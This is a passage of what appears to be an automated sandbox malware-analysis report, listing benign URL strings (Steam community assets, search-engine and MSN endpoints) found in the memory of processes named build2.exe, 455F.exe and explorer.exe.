Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=04yYNdQN
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=GcU7
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=mzRLkn3mcg_t&l=e
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=yEYKdqHaNBdl&l=en
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=CsP7NL79wjTK&am
